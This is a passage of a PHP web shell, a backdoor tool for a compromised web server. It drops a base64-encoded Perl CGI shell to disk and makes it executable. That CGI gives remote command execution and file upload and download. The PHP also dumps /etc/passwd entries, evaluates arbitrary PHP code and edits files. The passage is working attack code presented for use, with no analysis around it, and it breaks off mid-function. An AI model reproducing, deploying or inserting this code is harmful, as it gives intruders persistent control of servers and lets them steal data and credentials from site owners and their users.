S0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gZG93bmxvYWQgZmlsZXMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4KJFByb21wdCBkb3dubG9hZDxicj48YnI+CkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+CkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byB1cGxvYWQgZmlsZXMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQp7CgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsKCXByaW50IDw8RU5EOwo8Y29kZT4KCjxmb3JtIG5hbWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgokUHJvbXB0IHVwbG9hZDxicj48YnI+CkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+Ck92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8YnI+PGJyPgpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9InVwbG9hZCI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHRpbWVvdXQgZm9yIGEgY29tbWFuZCBleHBpcmVzLiBXZSBuZWVkIHRvCiMgdGVybWluYXRlIHRoZSBzY3JpcHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBpcwojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQ29tbWFuZFRpbWVvdXQKewoJaWYoISRXaW5OVCkKCXsKCQlhbGFybSgwKTsKCQlwcmludCA8PEVORDsKPC94bXA+Cgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQpFTkQKCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJCWV4aXQ7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBleGVjdXRlIGNvbW1hbmRzLiBJdCBkaXNwbGF5cyB0aGUgb3V0cHV0IG9mIHRoZQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5CiMgY29tbWFuZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5IGlzIHN0b3JlZCBpbgojIGFuIGludGVybmFsIHZhcmlhYmxlIGFuZCBpcyB1c2VkIGVhY2ggdGltZSBhIGNvbW1hbmQgaGFzIHRvIGJlIGV4ZWN1dGVkLiBUaGUKIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2VycwojIHRoZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBFeGVjdXRlQ29tbWFuZAp7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsKCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7CgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7CgkJcHJpbnQgIiRQcm9tcHQgJFJ1bkNvbW1hbmQiOwoJfQoJZWxzZSAjIHNvbWUgb3RoZXIgY29tbWFuZCwgZGlzcGxheSB0aGUgb3V0cHV0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOwoJCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJCXByaW50ICIkUHJvbXB0ICRSdW5Db21tYW5kPHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgoKU2VuZGluZyBGaWxlICRUcmFuc2ZlckZpbGUuLi48YnI+CklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPi4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBmaWxlIGRvZXNuJ3QgZXhpc3QKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gcmVhZHMgdGhlIHNwZWNpZmllZCBmaWxlIGZyb20gdGhlIGRpc2sgYW5kIHNlbmRzIGl0IHRvIHRoZQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2FuIGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIHNlbnQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyCnsKCWxvY2FsKCRTZW5kRmlsZSkgPSBAXzsKCWlmKG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcKCXsKCQlpZigkV2luTlQpCgkJewoJCQliaW5tb2RlKFNFTkRGSUxFKTsKCQkJYmlubW9kZShTVERPVVQpOwoJCX0KCQkkRmlsZVNpemUgPSAoc3RhdCgkU2VuZEZpbGUpKVs3XTsKCQkoJEZpbGVuYW1lID0gJFNlbmRGaWxlKSA9fiAgbSEoW14vXlxcXSopJCE7CgkJcHJpbnQgIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOwoJCXByaW50ICJDb250ZW50LUxlbmd0aDogJEZpbGVTaXplXG4iOwoJCXByaW50ICJDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kMVxuXG4iOwoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOwoJCWNsb3NlKFNFTkRGSUxFKTsKCX0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAkISI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQojIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsgdGhyb3VnaCB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIyBUaGlzIGZ1bmN0aW9uIGlzIGFsc28gY2FsbGVkIHdoZW4gdGhlIHVzZXIgY2xpY2tzIG9uIHRoYXQgbGluay4gSW4gdGhpcyBjYXNlLAojIHRoZSBmaWxlIGlzIHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJlZ2luRG93bmxvYWQKewoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZAoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8CgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOwoJfQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UKCXsKCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IHN0YXJ0cyB0aGUgdXBsb2FkIHByb2Nlc3MuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFVwbG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlVXBsb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJCXJldHVybjsKCX0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJcHJpbnQgIlVwbG9hZGluZyAkVHJhbnNmZXJGaWxlIHRvICRDdXJyZW50RGlyLi4uPGJyPiI7CgoJIyBnZXQgdGhlIGZ1bGxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgY3JlYXRlZAoJY2hvcCgkVGFyZ2V0TmFtZSkgaWYgKCRUYXJnZXROYW1lID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkkVHJhbnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOwoJJFRhcmdldE5hbWUgLj0gJFBhdGhTZXAuJDE7CgoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7CgkjIGlmIHRoZSBmaWxlIGV4aXN0cyBhbmQgd2UgYXJlIG5vdCBzdXBwb3NlZCB0byBvdmVyd3JpdGUgaXQKCWlmKC1lICRUYXJnZXROYW1lICYmICRPcHRpb25zIG5lICJvdmVyd3JpdGUiKQoJewoJCXByaW50ICJGYWlsZWQ6IERlc3RpbmF0aW9uIGZpbGUgYWxyZWFkeSBleGlzdHMuPGJyPiI7Cgl9CgllbHNlICMgZmlsZSBpcyBub3QgcHJlc2VudAoJewoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQoJCXsKCQkJYmlubW9kZShVUExPQURGSUxFKSBpZiAkV2luTlQ7CgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9OwoJCQljbG9zZShVUExPQURGSUxFKTsKCQkJcHJpbnQgIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQlwcmludCAiRmlsZSBQYXRoOiAkVGFyZ2V0TmFtZTxicj4iOwoJCX0KCQllbHNlCgkJewoJCQlwcmludCAiRmFpbGVkOiAkITxicj4iOwoJCX0KCX0KCXByaW50ICIiOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgoJJlByaW50UGFnZUZvb3RlcjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rCiMgdGhyb3VnaCAgd2hpY2ggdGhlIGZpbGUgY2FuIGJlIGRvd25sb2FkZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIERvd25sb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2FpbgoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJCXJldHVybjsKCX0KCQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZAoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8CgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOwoJfQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UKCXsKCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CgokQWN0aW9uID0gJGlueydhJ307CiRBY3Rpb24gPSAibG9naW4iIGlmKCRBY3Rpb24gZXEgIiIpOyAjIG5vIGFjdGlvbiBzcGVjaWZpZWQsIHVzZSBkZWZhdWx0CgojIGdldCB0aGUgZGlyZWN0b3J5IGluIHdoaWNoIHRoZSBjb21tYW5kcyB3aWxsIGJlIGV4ZWN1dGVkCiRDdXJyZW50RGlyID0gJGlueydkJ307CmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsKCiRMb2dnZWRJbiA9ICRDb29raWVzeydTQVZFRFBXRCd9IGVxICRQYXNzd29yZDsKCmlmKCRBY3Rpb24gZXEgImxvZ2luIiB8fCAhJExvZ2dlZEluKSAjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMgdG8gcnVuIGEgY29tbWFuZAp7CgkmRXhlY3V0ZUNvbW1hbmQ7Cn0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgIyB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUKewoJJlVwbG9hZEZpbGU7Cn0KZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAjIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlCnsKCSZEb3dubG9hZEZpbGU7Cn0KZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dAp7CgkmUGVyZm9ybUxvZ291dDsKfQ==';
	$cgi_file = 'izo.sonicq12';
	$create_cgi = fopen($cgi_file, 'w+');
	fwrite($create_cgi,base64_decode($cgi_code));
	fclose($create_cgi);
	chmod($cgi_file, 0755);
	echo '<br />Open <a href="sonic/.htaccess" target="_blank">.Htaccess</a><br />';
	echo 'Open <a href="sonic/izo.sonicq12" target="_blank"> Open CGI </a>';
	}

    elseif ($action == 'etcpwd') {

        formhead(array('title'=>'Get /etc/passwd'));

        makehide('action','etcpwd');

        makehide('dir',$nowpath);

        $i = 0;

        echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";

        while ($i < 60000) {



            $line = posix_getpwuid($i);

            if (!empty($line)) {



                while (list ($key, $vba_etcpwd) = each($line)){

                    echo "".$vba_etcpwd."\n";

                    break;

                }



            }



            $i++;

        }

        echo "</textarea></p>";

        formfoot();

    }



    elseif ($action == 'eval') {

        $phpcode = trim($phpcode);

        if($phpcode){

            if (!preg_match('#<\?#si', $phpcode)) {

                $phpcode = "<?php\n\n{$phpcode}\n\n?>";

            }

            eval("?".">$phpcode<?");

        }

        formhead(array('title'=>'Eval PHP Code'));

        makehide('action','eval');

        maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));

        formfooter();

    }



    elseif ($action == 'editfile') {

        if(file_exists($opfile)) {

            $fp=@fopen($opfile,'r');

            $contents=@fread($fp, filesize($opfile));

            @fclose($fp);

            $contents=htmlspecialchars($contents);

        }

        formhead(array('title'=>'Create / Edit File'));

        makehide('action','file');

        makehide('dir',$nowpath);

